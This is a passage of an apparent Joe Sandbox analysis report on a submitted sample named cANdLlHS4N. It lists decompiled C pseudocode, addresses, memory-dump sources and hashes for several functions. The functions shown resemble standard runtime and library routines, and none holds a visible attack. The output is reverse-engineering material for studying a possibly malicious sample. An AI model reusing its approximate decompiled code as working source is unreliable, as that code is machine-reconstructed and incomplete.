      						 *(_t135 + 0x9c) =  *(_t136 - 0x18);
      						__eflags = _t97;
      						if(__eflags != 0) {
      							_t106 = 0;
      							__eflags = 0;
      							goto L12;
      						}
      						E009B4535(_t106, _t131, _t133, _t135, __eflags);
      						 *((intOrPtr*)( *_t135 + 4))(1, 0xf104, _t97, 0xffffffff);
      						goto L3;
      					}
      					_push(0xffffffff);
      					_push(_t106);
      					_push(0xf104);
      					E009B4535(_t106, _t131, _t133, _t135, __eflags);
      					goto L3;
      				}
      				if( *((intOrPtr*)( *_t135 + 0xd8))() != 0) {
      					 *((intOrPtr*)(_t136 - 0x10)) = E009A6B56();
      					goto L6;
      				} else {
      					 *0xd0fb78 = 0;
      					goto L3;
      				}
      			}

      0x009b528b
      0x009b528b
      0x009b5292
      0x009b5297
      0x009b5299
      0x009b529f
      0x009b52a1
      0x009b52a4
      0x009b52a9
      0x009b52d5
      0x009b52d7
      0x009b52de
      0x009b52de
      0x009b52e0
      0x009b52f1
      0x009b52f4
      0x009b5339
      0x009b5339
      0x009b533c
      0x009b5385
      0x009b538e
      0x009b5394
      0x009b539c
      0x009b53a6
      0x009b53a9
      0x009b53ab
      0x009b53fe
      0x009b5407
      0x009b540d
      0x009b5414
      0x009b5419
      0x009b5419
      0x009b541b
      0x009b541b
      0x009b5420
      0x009b5423
      0x009b5425
      0x009b5428
      0x009b542d
      0x009b542d
      0x009b5428
      0x009b543b
      0x009b543e
      0x009b5440
      0x009b5445
      0x009b5445
      0x009b53ad
      0x009b53b0
      0x009b53c3
      0x009b53c5
      0x009b53d6
      0x009b53e0
      0x009b53c7
      0x009b53cc
      0x009b53cc
      0x009b53b2
      0x009b53b7
      0x009b53b7
      0x009b53e3
      0x009b53ea
      0x009b52bf
      0x009b52bf
      0x00000000
      0x009b52bf
      0x009b5343
      0x009b5349
      0x009b534c
      0x009b534e
      0x009b534e
      0x009b535c
      0x009b535f
      0x009b5361
      0x00000000
      0x009b5367
      0x009b5367
      0x009b536a
      0x009b5375
      0x009b5375
      0x00000000
      0x009b536a
      0x009b5361
      0x009b52fc
      0x009b5304
      0x009b530c
      0x009b5312
      0x009b5315
      0x009b531b
      0x009b531d
      0x009b5337
      0x009b5337
      0x00000000
      0x009b5337
      0x009b5327
      0x009b5332
      0x00000000
      0x009b5332
      0x009b52e2
      0x009b52e4
      0x009b52e5
      0x009b52ea
      0x00000000
      0x009b52ea
      0x009b52b7
      0x009b52cb
      0x00000000
      0x009b52b9
      0x009b52b9
      0x00000000
      0x009b52b9

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3
      • String ID:
      • API String ID: 431132790-0
      • Opcode ID: 2fc0fb09d33d4c54df915f04992305c418ad3b948b6d3477d2d754c1be7cae18
      • Instruction ID: 412943f528f751ab2482bfac7292e58ccd3d9350114304a5ec77418072a13190
      • Opcode Fuzzy Hash: 2fc0fb09d33d4c54df915f04992305c418ad3b948b6d3477d2d754c1be7cae18
      • Instruction Fuzzy Hash: CE513930601616DFCB14EFA4C594BADBBF5BF48320F124569E8669B3A1DB709D40CF91
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009C9C9A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _t54;
      				intOrPtr _t56;
      				intOrPtr _t62;
      				intOrPtr _t64;
      				intOrPtr _t66;
      				intOrPtr _t71;
      				void* _t72;
      				void* _t73;
      				intOrPtr _t74;
      				intOrPtr _t75;
      				intOrPtr _t77;
      
      				_t73 = __eflags;
      				_push(4);
      				E00AAD232(0xac9ba6, __ebx, __edi, __esi);
      				_t71 = __ecx;
      				 *((intOrPtr*)(_t72 - 0x10)) = __ecx;
      				E009B0609(__ecx, _t73);
      				 *((intOrPtr*)(_t72 - 4)) = 0;
      				E009A5D70(__ecx + 0x28, __edx, E009B9D52());
      				 *((char*)(_t72 - 4)) = 1;
      				E009A5D70(__ecx + 0x84, __edx, E009B9D52());
      				 *((intOrPtr*)(__ecx + 0x54)) =  *((intOrPtr*)(_t72 + 8));
      				 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(_t72 + 0xc));
      				 *((intOrPtr*)(__ecx + 0x6c)) =  *((intOrPtr*)(_t72 + 0x10));
      				 *((intOrPtr*)(__ecx + 0x58)) = 0;
      				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x60)) = 0;
      				 *((intOrPtr*)(__ecx + 0x64)) = 0;
      				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(_t72 + 0x14));
      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
      				 *((intOrPtr*)(__ecx + 0x78)) = 0;
      				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x80)) = 0;
      				 *((intOrPtr*)(__ecx + 0x24)) = 0;
      				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x40)) = 0;
      				 *((intOrPtr*)(__ecx + 0x44)) = 0;
      				 *((intOrPtr*)(__ecx + 0x48)) = 0;
      				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x50)) = 0;
      				 *((char*)(_t72 - 4)) = 2;
      				_t74 =  *0xd080a4; // 0x0
      				if(_t74 == 0) {
      					 *((intOrPtr*)(__ecx + 0x20)) = 1;
      					E009C9BDB(__ecx); // executed
      				} else {
      					 *((intOrPtr*)(__ecx + 0x20)) = 0;
      					_t75 =  *0xd0fb70; // 0x0
      					if(_t75 == 0) {
      						_t66 = E009A6291(_t75, 0x1c);
      						 *((intOrPtr*)(_t72 + 8)) = _t66;
      						 *((char*)(_t72 - 4)) = 3;
      						if(_t66 == 0) {
      							_t56 = 0;
      							__eflags = 0;
      						} else {
      							_t56 = E009BBD78(_t66, 0xa);
      						}
      						 *((char*)(_t72 - 4)) = 2;
      						 *0xd0fb70 = _t56;
      					}
      					_t77 =  *0xd0fb6c; // 0x0
      					if(_t77 == 0) {
      						_t64 = E009A6291(_t77, 0x20);
      						 *((intOrPtr*)(_t72 + 8)) = _t64;
      						 *((char*)(_t72 - 4)) = 4;
      						_t78 = _t64;
      						if(_t64 == 0) {
      							_t54 = 0;
      							__eflags = 0;
      						} else {
      							_t54 = E009C6A6A(_t64);
      						}
      						 *((char*)(_t72 - 4)) = 2;
      						 *0xd0fb6c = _t54;
      					}
      					_t62 =  *0xd0fb70; // 0x0
      					E009BBE03(_t62, _t78, _t71);
      				}
      				return E00AAD30A(_t71);
      			}

      0x009c9c9a
      0x009c9c9a
      0x009c9ca1
      0x009c9ca6
      0x009c9ca8
      0x009c9cab
      0x009c9cb2
      0x009c9cbe
      0x009c9cc3
      0x009c9cd3
      0x009c9cdb
      0x009c9ce1
      0x009c9ce7
      0x009c9ced
      0x009c9cf0
      0x009c9cf3
      0x009c9cf6
      0x009c9cf9
      0x009c9cfc
      0x009c9cff
      0x009c9d02
      0x009c9d05
      0x009c9d0b
      0x009c9d0e
      0x009c9d11
      0x009c9d14
      0x009c9d17
      0x009c9d1a
      0x009c9d1d
      0x009c9d20
      0x009c9d24
      0x009c9d2a
      0x009c9d9f
      0x009c9da6
      0x009c9d2c
      0x009c9d2c
      0x009c9d2f
      0x009c9d35
      0x009c9d3f
      0x009c9d41
      0x009c9d44
      0x009c9d4a
      0x009c9d55
      0x009c9d55
      0x009c9d4c
      0x009c9d4e
      0x009c9d4e
      0x009c9d57
      0x009c9d5b
      0x009c9d5b
      0x009c9d60
      0x009c9d66
      0x009c9d70
      0x009c9d72
      0x009c9d75
      0x009c9d79
      0x009c9d7b
      0x009c9d84
      0x009c9d84
      0x009c9d7d
      0x009c9d7d
      0x009c9d7d
      0x009c9d86
      0x009c9d8a
      0x009c9d8a
      0x009c9d8f
      0x009c9d96
      0x009c9d96
      0x009c9db2

      APIs
      • __EH_prolog3.LIBCMT ref: 009C9CA1
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3_malloc
      • String ID:
      • API String ID: 2346879263-0
      • Opcode ID: 8af9aba8572ff8845adc828bbb3d1e58fb9f6e122412f45977bd2d5ba5e1f7f5
      • Instruction ID: ba6773f9bb1fed107dbf5b83f41420444ff8bc8a3f5408fe5b427093ba03f264
      • Opcode Fuzzy Hash: 8af9aba8572ff8845adc828bbb3d1e58fb9f6e122412f45977bd2d5ba5e1f7f5
      • Instruction Fuzzy Hash: 1631F3B0900B40DEC721DF6AC54579AFBE4BF94700F20491FE18AD7AA1DBB4A900CB56
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E009A1CE0(signed int __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _t32;
      				void* _t36;
      				signed int _t43;
      				signed int _t47;
      				intOrPtr _t49;
      				intOrPtr _t52;
      				intOrPtr _t56;
      				void* _t58;
      				intOrPtr _t59;
      				intOrPtr _t61;
      				void* _t63;
      				intOrPtr _t65;
      
      				_t49 = __edx;
      				_t43 = __ecx;
      				_v12 = 0;
      				_v8 = 0;
      				_t59 = _a12;
      				if(_t59 >= 0 && (_t59 > 0 || _a8 > 0)) {
      					do {
      						_t32 = E009A1BC0(_t43);
      						_t52 = _t49;
      						_t56 = _t32;
      						_t61 = _t52;
      						if(_t61 < 0 || _t61 <= 0 && _t56 == 0) {
      							_t49 =  *_t43;
      							_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0xc))))( *_a4 & 0x000000ff); // executed
      							_t47 = _t43 | 0xffffffff;
      							if(_t36 != _t47) {
      								_a4 =  &(_a4[1]);
      								_v12 = _v12 + 1;
      								asm("adc dword [ebp-0x4], 0x0");
      								_a8 = _a8 + _t47;
      								asm("adc [ebp+0x10], ecx");
      								goto L14;
      							}
      						} else {
      							_t63 = _a12 - _t52;
      							if(_t63 <= 0 && (_t63 < 0 || _a8 < _t56)) {
      								_t56 = _a8;
      							}
      							_t49 =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24))));
      							E00AAB080(_t49, _a4, _t56);
      							_a4 =  &(_a4[_t56]);
      							_t58 = _t58 + 0xc;
      							_v12 = _v12 + _t56;
      							asm("adc [ebp-0x4], edi");
      							_a8 = _a8 - _t56;
      							asm("sbb [ebp+0x10], edi");
      							 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x34)))) =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x34)))) - _t56;
      							 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24)))) =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x24)))) + _t56;
      							goto L14;
      						}
      						break;
      						L14:
      						_t65 = _a12;
      					} while (_t65 > 0 || _t65 >= 0 && _a8 > 0);
      				}
      				return _v12;
      			}

      0x009a1ce0
      0x009a1ce9
      0x009a1ceb
      0x009a1cee
      0x009a1cf1
      0x009a1cf4
      0x009a1d07
      0x009a1d09
      0x009a1d0e
      0x009a1d10
      0x009a1d12
      0x009a1d14
      0x009a1d63
      0x009a1d6b
      0x009a1d6d
      0x009a1d72
      0x009a1d79
      0x009a1d7c
      0x009a1d7f
      0x009a1d83
      0x009a1d86
      0x00000000
      0x009a1d86
      0x009a1d1c
      0x009a1d1f
      0x009a1d21
      0x009a1d2a
      0x009a1d2d
      0x009a1d35
      0x009a1d3a
      0x009a1d3f
      0x009a1d45
      0x009a1d48
      0x009a1d4b
      0x009a1d4e
      0x009a1d51
      0x009a1d54
      0x009a1d59
      0x00000000
      0x009a1d59
      0x00000000
      0x009a1d89
      0x009a1d89
      0x009a1d89
      0x009a1da0
      0x009a1dab

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memmove
      • String ID:
      • API String ID: 4104443479-0
      • Opcode ID: 488a4bf6a4083646c429ee38936c4c22e9e0762ab1822b3acbda9a345487fa90
      • Instruction ID: 0e4026bdaa76c9acfed79fee83c67beecbef652d7e451a96c40135afd4e7da07
      • Opcode Fuzzy Hash: 488a4bf6a4083646c429ee38936c4c22e9e0762ab1822b3acbda9a345487fa90
      • Instruction Fuzzy Hash: 62212B35900259EFCB54DE69C88469D77B9EF8A321F24856AEC29CB291D774CE80CFD0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E009AD57A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
      				void* _t46;
      				intOrPtr _t62;
      				signed int _t64;
      				signed int _t68;
      				intOrPtr _t71;
      				intOrPtr _t76;
      				intOrPtr* _t82;
      				void* _t84;
      				void* _t88;
      
      				_t88 = __eflags;
      				_push(0x44);
      				E00AAD2D1(0xac8015, __ebx, __edi, __esi);
      				_push(E009AB424);
      				 *((intOrPtr*)(_t84 - 0x28)) =  *((intOrPtr*)(_t84 + 8));
      				_t62 = E009BCDBD(__ebx, 0xd0fd04, __edi, __esi, _t88);
      				_t71 = 0;
      				 *((intOrPtr*)(_t84 - 0x2c)) = _t62;
      				if((0 | _t62 != 0x00000000) == 0) {
      					E009B8782(0xd0fd04);
      				}
      				_t64 = 7;
      				_t7 = _t62 + 0x58; // 0x58
      				_t46 = memcpy(_t84 - 0x50, _t7, _t64 << 2);
      				_t76 =  *((intOrPtr*)(_t84 + 0x10));
      				_t82 =  *((intOrPtr*)(_t84 - 0x28));
      				 *(_t62 + 0x60) = _t46;
      				 *(_t62 + 0x58) =  *(_t84 + 0xc);
      				 *((intOrPtr*)(_t62 + 0x5c)) = _t76;
      				 *((intOrPtr*)(_t62 + 0x64)) =  *((intOrPtr*)(_t84 + 0x18));
      				 *((intOrPtr*)(_t84 - 4)) = _t71;
      				if(_t76 == 2 &&  *((intOrPtr*)(_t82 + 0x68)) != _t71) {
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x68)))) + 0x60))(_t71);
      					_t71 = 0;
      				}
      				 *((intOrPtr*)(_t84 - 0x24)) = _t71;
      				 *((intOrPtr*)(_t84 - 0x20)) = _t71;
      				 *((intOrPtr*)(_t84 - 0x1c)) = _t71;
      				 *((intOrPtr*)(_t84 - 0x18)) = _t71;
      				 *((intOrPtr*)(_t84 - 0x28)) = _t71;
      				if(_t76 == 0x110) {
      					E009AB92C(_t82, _t84 - 0x24, _t84 - 0x28);
      				}
      				 *((intOrPtr*)(_t84 - 0x34)) =  *((intOrPtr*)( *_t82 + 0x114))(_t76,  *((intOrPtr*)(_t84 + 0x14)),  *((intOrPtr*)(_t84 + 0x18)));
      				if(_t76 == 0x110) {
      					E009AD4D9(_t62, _t71, _t82, _t84 - 0x24,  *((intOrPtr*)(_t84 - 0x28)));
      				}
      				_t36 = _t62 + 0x58; // 0x58
      				_t68 = 7;
      				_t83 = _t84 - 0x50;
      				memcpy(_t36, _t84 - 0x50, _t68 << 2);
      				return E00AAD32D(_t62, _t84 - 0x50 + _t68 + _t68, _t83);
      			}

      0x009ad57a
      0x009ad57a
      0x009ad581
      0x009ad589
      0x009ad593
      0x009ad59b
      0x009ad59f
      0x009ad5a6
      0x009ad5ab
      0x009ad5ad
      0x009ad5ad
      0x009ad5b7
      0x009ad5b8
      0x009ad5be
      0x009ad5c0
      0x009ad5c6
      0x009ad5c9
      0x009ad5cf
      0x009ad5d2
      0x009ad5d5
      0x009ad5d8
      0x009ad5de
      0x009ad5eb
      0x009ad5ee
      0x009ad5ee
      0x009ad5f0
      0x009ad5f3
      0x009ad5f6
      0x009ad5f9
      0x009ad5fc
      0x009ad605
      0x009ad610
      0x009ad610
      0x009ad626
      0x009ad62f
      0x009ad639
      0x009ad639
      0x009ad66e
      0x009ad671
      0x009ad672
      0x009ad675
      0x009ad67c

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 009AD581
        • Part of subcall function 009BCDBD: __EH_prolog3.LIBCMT ref: 009BCDC4
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3H_prolog3_catch_Throw
      • String ID:
      • API String ID: 2399685165-0
      • Opcode ID: 5374bff2f71ca28375e228211766cfe5cfce328c4a2c88314aba672f1c98e9e4
      • Instruction ID: cda4e393cf4cc063b4558b4e9d3dfe03fdb15b35340d1a9e8ced44249c463016
      • Opcode Fuzzy Hash: 5374bff2f71ca28375e228211766cfe5cfce328c4a2c88314aba672f1c98e9e4
      • Instruction Fuzzy Hash: 293116B1E012089FCF08DFA8C8819DEBBF6BF89310F14442AE905AB655D734A940CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 88%
      			E009A2200(void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
      				intOrPtr* _v8;
      				char _v16;
      				intOrPtr* _v20;
      				char _v36;
      				char _v72;
      				signed int _t25;
      				intOrPtr* _t28;
      				intOrPtr _t33;
      				intOrPtr* _t36;
      				signed char _t39;
      				intOrPtr _t45;
      				void* _t49;
      				void* _t52;
      				intOrPtr* _t55;
      				signed int _t56;
      
      				_t52 = __edi;
      				_t49 = __edx;
      				_push(0xffffffff);
      				_push(0xac77fb);
      				_push( *[fs:0x0]);
      				_t25 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t25 ^ _t56);
      				 *[fs:0x0] =  &_v16;
      				_t28 = _a4;
      				_t39 = 0;
      				_v20 = 0;
      				if(_t28 != 0) {
      					_t62 =  *_t28;
      					if( *_t28 == 0) {
      						_t55 = E009A6291(_t62, 0x18);
      						_v20 = _t55;
      						_v8 = 0;
      						if(_t55 == 0) {
      							_t55 = 0;
      							__eflags = 0;
      						} else {
      							_t33 =  *_a8;
      							_t45 =  *((intOrPtr*)(_t33 + 0x18));
      							_t64 = _t45;
      							if(_t45 == 0) {
      								_t34 = _t33 + 0x1c;
      								__eflags = _t33 + 0x1c;
      							} else {
      								_t34 = _t45;
      							}
      							E009A20A0( &_v72, _t49, _t52, _t34);
      							_t39 = 1;
      							 *((intOrPtr*)(_t55 + 4)) = 0;
      							 *_t55 = 0xad6e3c;
      							_t36 = E00AC5A33(_t52, _t64,  &_v36);
      							 *((intOrPtr*)(_t55 + 8)) =  *_t36;
      							 *((intOrPtr*)(_t55 + 0xc)) =  *((intOrPtr*)(_t36 + 4));
      							 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t36 + 8));
      							 *((intOrPtr*)(_t55 + 0x14)) =  *((intOrPtr*)(_t36 + 0xc));
      						}
      						_v8 = 0xffffffff;
      						 *_a4 = _t55;
      						if((_t39 & 0x00000001) != 0) {
      							E009A2150(); // executed
      						}
      					}
      				}
      				 *[fs:0x0] = _v16;
      				return 2;
      			}

      0x009a2200
      0x009a2200
      0x009a2203
      0x009a2205
      0x009a2210
      0x009a2216
      0x009a221d
      0x009a2221
      0x009a2227
      0x009a222a
      0x009a222c
      0x009a2231
      0x009a2237
      0x009a2239
      0x009a2246
      0x009a224b
      0x009a224e
      0x009a2253
      0x009a22a8
      0x009a22a8
      0x009a2255
      0x009a2258
      0x009a225a
      0x009a225d
      0x009a225f
      0x009a2265
      0x009a2265
      0x009a2261
      0x009a2261
      0x009a2261
      0x009a226c
      0x009a2275
      0x009a227a
      0x009a2281
      0x009a2287
      0x009a228e
      0x009a2294
      0x009a229a
      0x009a22a3
      0x009a22a3
      0x009a22ad
      0x009a22b4
      0x009a22b9
      0x009a22be
      0x009a22be
      0x009a22b9
      0x009a2239
      0x009a22cb
      0x009a22d8

      APIs
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • __Getctype.LIBCPMT ref: 009A2287
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Getctype_malloc
      • String ID:
      • API String ID: 1151285845-0
      • Opcode ID: 17b681cd98098e862dad4ea9ea8eec62518bb1edb2f7261f3f77d3a315feba3d
      • Instruction ID: 9ac0a761d49f6001f4bbcc92c67ba7e55c2906bbc8f0747beba53b910db35567
      • Opcode Fuzzy Hash: 17b681cd98098e862dad4ea9ea8eec62518bb1edb2f7261f3f77d3a315feba3d
      • Instruction Fuzzy Hash: 4B217CB1A05605DFC728CF9CC881B9AB7F4FF49710F04866EE8269B791D771AA00CB90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 44%
      			E009A5590(intOrPtr* __ecx, void* __edx, signed int _a4) {
      				intOrPtr _v0;
      				signed int* _v8;
      				intOrPtr _v12;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				intOrPtr* _t16;
      				void* _t17;
      				void* _t21;
      				void* _t24;
      				intOrPtr _t25;
      				intOrPtr* _t27;
      				intOrPtr* _t30;
      				signed int _t31;
      				void* _t43;
      				void* _t44;
      				void* _t46;
      				intOrPtr _t47;
      				intOrPtr* _t48;
      				void* _t50;
      
      				_t27 = __ecx;
      				E009A54F0(_t24, __ecx, __edx, _t43, _t46, 0x8007000e);
      				asm("int3");
      				asm("int3");
      				asm("int3");
      				asm("int3");
      				asm("int3");
      				asm("int3");
      				_t47 =  *_t27;
      				_t25 =  *((intOrPtr*)(_t47 - 0xc));
      				_t48 = _t47 - 0x10;
      				_v12 = _t27;
      				_t16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t48)) + 0x10))))(_t43, _t46, _t24, _t27, _t50);
      				_t39 =  *((intOrPtr*)( *_t16));
      				_t30 = _t16; // executed
      				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t16))))(_v0, 1); // executed
      				_t44 = _t17;
      				if(_t44 == 0) {
      					E009A5590(_t30, _t39);
      				}
      				_t18 = _a4;
      				if(_t25 < _a4) {
      					_t18 = _t25;
      				}
      				_t6 = _t48 + 0x10; // 0x1
      				_t7 = _t44 + 0x10; // 0x10
      				_t31 = _t7;
      				_a4 = _t31;
      				E00AAC44E(_t31, _t18 + 1, _t6, _t18 + 1);
      				 *((intOrPtr*)(_t44 + 4)) = _t25;
      				_t10 = _t48 + 0xc; // -3
      				_t21 = _t10;
      				asm("lock xadd [eax], ecx");
      				if((_t31 | 0xffffffff) - 1 <= 0) {
      					_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t48)) + 4))))(_t48);
      				}
      				 *_v8 = _a4;
      				return _t21;
      			}

      0x009a5590
      0x009a5595
      0x009a559a
      0x009a559b
      0x009a559c
      0x009a559d
      0x009a559e
      0x009a559f
      0x009a55a6
      0x009a55a8
      0x009a55ab
      0x009a55ae
      0x009a55b9
      0x009a55c0
      0x009a55c5
      0x009a55c7
      0x009a55c9
      0x009a55cd
      0x009a55cf
      0x009a55cf
      0x009a55d4
      0x009a55d9
      0x009a55db
      0x009a55db
      0x009a55df
      0x009a55e3
      0x009a55e3
      0x009a55e8
      0x009a55eb
      0x009a55f3
      0x009a55f6
      0x009a55f6
      0x009a55fc
      0x009a5603
      0x009a560d
      0x009a560d
      0x009a5617
      0x009a561d

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
